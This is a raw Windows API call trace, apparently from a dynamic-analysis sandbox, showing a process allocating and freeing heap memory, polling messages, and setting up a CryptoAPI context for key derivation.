[0175.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0175.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0175.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0175.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0175.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0175.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0175.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0175.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0175.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0175.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0175.047] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0175.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0175.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0175.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0175.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0175.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0175.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0175.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0175.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e699e8 [0175.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e699e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0175.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0175.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0175.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0175.048] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0175.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0175.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0175.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0175.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0175.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0175.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0175.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0175.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0175.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0175.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0175.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0175.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0175.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0175.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0175.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0175.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0175.049] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0175.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0175.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0175.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0175.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0175.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0175.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0175.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0175.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0175.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0175.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0175.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0175.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0175.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0175.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0175.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0175.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0175.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0175.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0175.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0175.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0175.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0175.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0175.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0175.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0175.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0175.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0175.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0175.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0175.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0175.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0175.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0175.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0175.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0175.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0175.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0175.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0175.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0175.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0175.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0175.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0175.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0175.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0175.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0175.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0175.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0175.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0175.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0175.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0175.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0175.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0175.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0175.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0175.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0175.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0175.055] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0175.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0175.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0175.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0175.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0175.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0175.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0175.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0175.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0175.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0175.055] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0175.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0175.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0175.056] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0175.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0175.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0175.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0175.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0175.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0175.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0175.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0175.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0175.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0175.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0175.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0175.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0175.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0175.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0175.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0175.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0175.056] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0175.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0175.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0175.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0175.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0175.057] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0175.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0175.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0175.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0175.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0175.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0175.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0175.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0175.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0175.057] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0175.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0175.057] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0175.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0175.057] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0175.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0175.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0175.057] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0175.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0175.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0175.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0175.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0175.058] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0175.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0175.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0175.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0175.058] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0175.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0175.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0175.058] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0175.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0175.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0175.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0175.058] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0175.058] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0175.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0175.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0175.058] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0175.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0175.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0175.059] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0175.059] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0175.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0175.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0175.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0175.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0175.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0175.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0175.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0175.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0175.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0175.059] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0175.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0175.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0175.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0175.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0175.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0175.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0175.061] 